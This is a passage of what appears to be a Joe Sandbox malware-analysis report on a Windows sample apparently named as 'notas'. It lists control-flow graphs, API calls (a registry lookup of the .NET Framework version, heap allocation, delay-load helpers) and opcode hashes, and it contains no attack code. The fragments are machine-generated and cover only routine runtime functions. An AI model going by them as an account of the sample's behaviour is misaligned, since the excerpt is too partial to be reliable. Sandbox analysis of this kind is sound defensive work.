                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 4a468a5df08eb0c39ee0081248d001202a8e28e517d3b868daca96c5385feade
                                                                    • Instruction ID: d5ce5842c5fdf16e31dbea679a03824fe5a90a1d9712dbe54223f8bf25b39f5d
                                                                    • Opcode Fuzzy Hash: 4a468a5df08eb0c39ee0081248d001202a8e28e517d3b868daca96c5385feade
                                                                    • Instruction Fuzzy Hash: 46014EB26143566BC320DF59C885A99FBACFB05370F114269F559A76C0D7706D20CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 231 221dff-221e21 232 221e23-221e33 call 221d9c 231->232 233 221e35-221e41 RegOpenKeyExW 231->233 235 221e47-221e4b 232->235 233->235 237 221e64-221e73 call 22a3ad 235->237 238 221e4d-221e61 call 221e76 235->238 238->237
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00020019,00000000,?,00000000,?,?,?,?,?,00221195,80000002,SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full,00020019), ref: 00221E41
                                                                      • Part of subcall function 00221D9C: GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00221E33,00000000,00020019,?,?,00000000,?,?,?,?,?,00221195), ref: 00221DAE
                                                                      • Part of subcall function 00221D9C: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00221DBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleOpenProc
                                                                    • String ID:
                                                                    • API String ID: 1337834000-0
                                                                    • Opcode ID: 50edae767568a8b137df58ac0df65711e5f61b9e72bcc97ede78848decf0b235
                                                                    • Instruction ID: 222e223b9b734dd6cc16b24ad190a6ffd833ce315600c0bb74737428807c641a
                                                                    • Opcode Fuzzy Hash: 50edae767568a8b137df58ac0df65711e5f61b9e72bcc97ede78848decf0b235
                                                                    • Instruction Fuzzy Hash: 84012D75A11229BBDB08CF95EC55EAFB7A8EF59714F01805DB80597240DA74AD208B90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 243 23479b-2347a6 244 2347b4-2347ba 243->244 245 2347a8-2347b2 243->245 247 2347d3-2347e4 RtlAllocateHeap 244->247 248 2347bc-2347bd 244->248 245->244 246 2347e8-2347f3 call 22e15c 245->246 253 2347f5-2347f7 246->253 249 2347e6 247->249 250 2347bf-2347c6 call 2323d1 247->250 248->247 249->253 250->246 256 2347c8-2347d1 call 231200 250->256 256->246 256->247
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00233374,00000001,00000364,00000006,000000FF,?,002311CD,?,00000004,00000000,?,?), ref: 002347DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: b17b6286d07340f4acddba8caa585dff48ea2b1b0362ae42d53de704f3852937
                                                                    • Instruction ID: 8f8d26420d1830ee5ffe46e555cb88a24e7d22ed19dbf27027d72f968d4e4dd6
                                                                    • Opcode Fuzzy Hash: b17b6286d07340f4acddba8caa585dff48ea2b1b0362ae42d53de704f3852937
                                                                    • Instruction Fuzzy Hash: F0F0B471630225A79B213E62AC05A5BB78C9B43BA0F1642A2AC18DB180CB60FC7186E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 269 229ca9-229cae 270 229c8e-229c96 call 22a090 269->270 272 229c9b-229c9c 270->272 272->269
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 21b90571c7be3c15241a5bdfc517d09a1ef9cc6f626fffd4301a873bb2344983
                                                                    • Instruction ID: b6e5db898304ae5734f9459b4ed819d624b15b439faaab535fcb79d545d4ac86
                                                                    • Opcode Fuzzy Hash: 21b90571c7be3c15241a5bdfc517d09a1ef9cc6f626fffd4301a873bb2344983
                                                                    • Instruction Fuzzy Hash: AFB012C22BC2217E315EB2947C02E3A028CE1C4F10370492BF400C9440D8800CB40133
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 4e6bfc0c72c4543a3fb7921484ccdb0ba8c9f5eb2fe0560c67b0ec87dcc90ebe
                                                                    • Instruction ID: fc9f70e50b77d013e14af8af2756c1d13b6d3b79efb7adf748677083c130283e
                                                                    • Opcode Fuzzy Hash: 4e6bfc0c72c4543a3fb7921484ccdb0ba8c9f5eb2fe0560c67b0ec87dcc90ebe
                                                                    • Instruction Fuzzy Hash: BCB012C62BC1217E315EB2A47C02E3A028CE2C4F103708C2BF800C9440D8800C740033
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: ef26178d5dba1e165327a08c6b38ca26cdb70e98eca038cd17fd123b0d6cbd56
                                                                    • Instruction ID: bd306cfe60c988b3ade222d9f2eb6b5143a2ff89265ae078e5c9458c06a09e8b
                                                                    • Opcode Fuzzy Hash: ef26178d5dba1e165327a08c6b38ca26cdb70e98eca038cd17fd123b0d6cbd56
                                                                    • Instruction Fuzzy Hash: 81B012C32BC1217E315EB2947C02E3A028CF1C4F10370482BF400C9440D8800C740033
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 259 229c84-229c89 260 229c8e-229c96 call 22a090 259->260 262 229c9b-229cae 260->262 262->260
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: e149335cb8187d6496ef1d0bc65c27a8ea814403434a103aa7099f34fced37de
                                                                    • Instruction ID: c88531be81a62f1e569a9392198714ad03f147e30fbdc12a3a72fb446642392d
                                                                    • Opcode Fuzzy Hash: e149335cb8187d6496ef1d0bc65c27a8ea814403434a103aa7099f34fced37de
                                                                    • Instruction Fuzzy Hash: A8B012D13BC1257E312F73907E02D3A020DE1D0F10370892BF800C444098800CB40433
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 264 229c9f-229ca4 265 229c8e-229c96 call 22a090 264->265 267 229c9b-229cae 265->267 267->265
                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 9cd275c7b25dd9cbdfc58f53c91e5191f1aec37bf80f9c04759f9b406b04d5f9
                                                                    • Instruction ID: f440d071def2577540a2a1dd2befa2914c287dbb63960a43866e554047e7df13
                                                                    • Opcode Fuzzy Hash: 9cd275c7b25dd9cbdfc58f53c91e5191f1aec37bf80f9c04759f9b406b04d5f9
                                                                    • Instruction Fuzzy Hash: 10B012D22BC1217F315EB3947E02E3A02CCF1C4F10770482BF400C9440D8800C750033
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 8c9c084798a557b973d8a6f3e13465faf947ca307fc7308bb27d57c3b18faed8
                                                                    • Instruction ID: e512a6e8dad863c14b23f3c9ea6fcc278e269fe95437aa45d81045cb47396265
                                                                    • Opcode Fuzzy Hash: 8c9c084798a557b973d8a6f3e13465faf947ca307fc7308bb27d57c3b18faed8
                                                                    • Instruction Fuzzy Hash: AFB012C12BD1217E315EB2D47C03E3A035CE1C4F10370882BF800C5440D8800C741433
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: ef2bbb54cb33d68fbf9870370dd96ff47dc9243c886011b6a7acef1fc4df423b
                                                                    • Instruction ID: 3c09440cb48960387cdd0d0c38beaef2286b40a753b40c0b3a83ff12e210da69
                                                                    • Opcode Fuzzy Hash: ef2bbb54cb33d68fbf9870370dd96ff47dc9243c886011b6a7acef1fc4df423b
                                                                    • Instruction Fuzzy Hash: BAB012D13BC2217E316FB2947C02E3A024CE1D4F10370452BF400C5440D8800CF40533
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 9ddaa85a0bb720cd0384bdca529724915da69dd3366e53171e56108863f53368
                                                                    • Instruction ID: f483e59e83fd51903cad263f13386486664f92e0249109e5a90f4128064e26e5
                                                                    • Opcode Fuzzy Hash: 9ddaa85a0bb720cd0384bdca529724915da69dd3366e53171e56108863f53368
                                                                    • Instruction Fuzzy Hash: 02B012D13BC1217E316FB794BE02E3A024CF1D4F10370442BF400C5440D8800CB50433
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 576de7d9aa1b6546265d5c4f043551ddcdb2489106d6794803461be5287f038d
                                                                    • Instruction ID: b5e86d7388f905b77b1fc36fa42cf57db6df63a3d4cb5f0ea2aeaf32c30d45b4
                                                                    • Opcode Fuzzy Hash: 576de7d9aa1b6546265d5c4f043551ddcdb2489106d6794803461be5287f038d
                                                                    • Instruction Fuzzy Hash: 11B012D13BC1317E316FB2947C02E3A024CF1D4F10370482BF400C5480D8800CB40433
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: e70a8e2480aa2c45f369e67d83a50125c2f11d09372c2897c90ef1f4f8ac3756
                                                                    • Instruction ID: 2a2cdb0dbcaad70f879bf9ce16548b5f5916cd057252269ec069a5af235adad7
                                                                    • Opcode Fuzzy Hash: e70a8e2480aa2c45f369e67d83a50125c2f11d09372c2897c90ef1f4f8ac3756
                                                                    • Instruction Fuzzy Hash: 26B092812B82217D211AA2942802E3A0249E1D4B10360452AB401C144098800CA40032
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 7ccdf656e753b56cb9c8defa11c7c6134925920f2e843966e7fac946cd31bb64
                                                                    • Instruction ID: d32a897d9726c3f7156d5d1489270df71694445db5ecaa1374a9e714f0cc1937
                                                                    • Opcode Fuzzy Hash: 7ccdf656e753b56cb9c8defa11c7c6134925920f2e843966e7fac946cd31bb64
                                                                    • Instruction Fuzzy Hash: 1EB012812B81217F326CB5947D02E3A034CE1C1F11730441FF404C4441D8800C782133
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229D62
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: 7d6bc8e421f30fdde2a9a513712834da0cca68a88da0b90beb9aa4a00c171d9f
                                                                    • Instruction ID: a6cf72eacb51a463c79b67ff5b1129f90e48075b5e6cd0a61f00f0bf4022caf7
                                                                    • Opcode Fuzzy Hash: 7d6bc8e421f30fdde2a9a513712834da0cca68a88da0b90beb9aa4a00c171d9f
                                                                    • Instruction Fuzzy Hash: 55B012812B82217E322C75907D02D3A030CE1D1F52330461FF401C484198800CB82133
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00229C96
                                                                      • Part of subcall function 0022A090: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0022A09B
                                                                      • Part of subcall function 0022A090: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0022A103
                                                                      • Part of subcall function 0022A090: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0022A114
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                    • String ID:
                                                                    • API String ID: 697777088-0
                                                                    • Opcode ID: c5982fae8437cced68f54c38a665de0cae8cd1f68d75e646ea4e2d1a3d6c650b
                                                                    • Instruction ID: 91f9113587d2838bc74e490d620bb7fbfb56aee6ede8db973168a721e6b64953
                                                                    • Opcode Fuzzy Hash: c5982fae8437cced68f54c38a665de0cae8cd1f68d75e646ea4e2d1a3d6c650b
                                                                    • Instruction Fuzzy Hash: 20A001D62BD222BD352AB6A17D06E3A025DE5D9F617B1892AF80285885A8801DA91436
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
